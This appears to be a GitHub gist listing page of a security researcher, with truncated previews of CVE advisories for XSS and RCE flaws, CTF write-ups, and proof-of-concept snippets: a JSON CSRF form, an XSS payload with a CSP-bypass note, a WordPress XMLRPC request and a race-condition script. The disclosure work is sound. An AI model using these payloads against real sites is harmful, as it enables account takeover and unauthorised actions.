Skip to content

Instantly share code, notes, and snippets.

View Xib3rR4dAr's full-sized avatar

Xib3rR4dAr

33 followers · 15 following
View GitHub Profile
@Xib3rR4dAr
Xib3rR4dAr / CVE-2024-57240_Apryse_WebViewer_XSS.md
Created March 13, 2025 09:53 — forked from devom3/CVE-2024-57240_Apryse_WebViewer_XSS.md
CVE-2024-57240: Cross-Site Scripting (XSS) Vulnerability in Apryse WebViewer <= 11.1

CVE-2024-57240: Cross-Site Scripting (XSS) Vulnerability in Apryse WebViewer ≤ 11.1

Date Published: Feb 24 2025

Summary

A Cross-Site Scripting (XSS) vulnerability has been identified in Apryse WebViewer versions up to and including 11.1. This vulnerability allows remote attackers to execute arbitrary JavaScript code by supplying a crafted PDF file. The issue arises due to improper sanitization of user-supplied input during PDF rendering.

Affected Product

@Xib3rR4dAr
Xib3rR4dAr / json_csrf.md
Created January 6, 2025 09:27
JSON CSRF

CSRF can be done in JSON requests if other mime types like text/plain are supported but data strcture should be of type JSON.

PoC:

<html>
  <body>
    <form action="https://example.com/link-device.php" method="POST" enctype="text/plain">
      <input type="hidden" name='{"code":"BINGOOOOM","foo=' value='":""}' />
@Xib3rR4dAr
Xib3rR4dAr / burp_intruder_all_printable_ascii_characters_list.md
Last active April 22, 2025 19:09
Burp Intruder all printable ASCII characters list
@Xib3rR4dAr
Xib3rR4dAr / dolibarr_20.0.4_rce.md
Last active March 9, 2025 20:36
Dolibarr <= 20.0.4 RCE

Remote Code Execution(RCE) in Dolibarr <= 20.0.4

Description: Remote Code Execution(RCE) in Dolibarr
Versions Affected: <= 20.0.4
Date: December 22, 2024
Researcher: Muhammad Zeeshan (Xib3rR4dAr)
Product Link: https://www.dolibarr.org

Proof-of-Concept Exploit

@Xib3rR4dAr
Xib3rR4dAr / keycloak_angular_js_1.8.3_xss_csp_bypass.md
Created November 17, 2024 20:53
Keycloak AngularJS 1.8.3 XSS CSP bypass

blob://example.com/3dfab3bd-a892-4448-92c3-de92d8eed2ea

<img src=x onerror=alert(1)>

Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'self'". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution. Note that hashes do not apply to event handlers, style attributes and javascript: navigations unless the 'unsafe-hashes' keyword is present.

angular.min.js

@Xib3rR4dAr
Xib3rR4dAr / Pydio_Core_8.2.5_Stored_XSS_PoC.md
Last active April 22, 2025 19:09
CVE-2024-40124 Pydio Core <= 8.2.5 Stored XSS PoC

Pydio Core <= 8.2.5 Stored XSS PoC

Advisory Information

Author: Muhammad Zeeshan (Xib3rR4dAr)
CVE: CVE-2024-40124
Title: Pydio Core <= 8.2.5 Stored XSS
Date published: June 25, 2024
Impact: Execution of malicious JavaScript leading to account takeover and phishing attacks.

@Xib3rR4dAr
Xib3rR4dAr / phash_solution.md
Last active July 3, 2023 10:55
Solution of challenge "phash" from AUPCTF

phash

Challenge Name: phash
Challenge Text: login source
Initial Hint: No Hint First Hint (when no one solved): Marvel characters (lowercased) Second Hint: Who was the character that fans speculated would appear in a "Marvel Show" but ultimately did not make an appearance? (Third Hint was provided after first 🩸 was obtained by me)

Provided:
image

@Xib3rR4dAr
Xib3rR4dAr / conundrum_solution.md
Created June 26, 2023 19:38
Solution of challenge "conundrum" from AUPCTF
@Xib3rR4dAr
Xib3rR4dAr / wp_xmlrpc_reqs.md
Created November 24, 2022 10:40
Wordpress XMLRPC 
POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Length: 91
Content-Type: application/x-www-form-urlencoded

<methodCall>
<methodName>system.listMethods</methodName>
@Xib3rR4dAr
Xib3rR4dAr / burp-suite-turbo-intruder-race.py
Created February 23, 2022 06:02
Racing script for Turbo Intruder extension in Burp Suite.
# From https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/race.py
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=False
)
# the 'gate' argument blocks the final byte of each request until openGate is invoked
for i in range(30):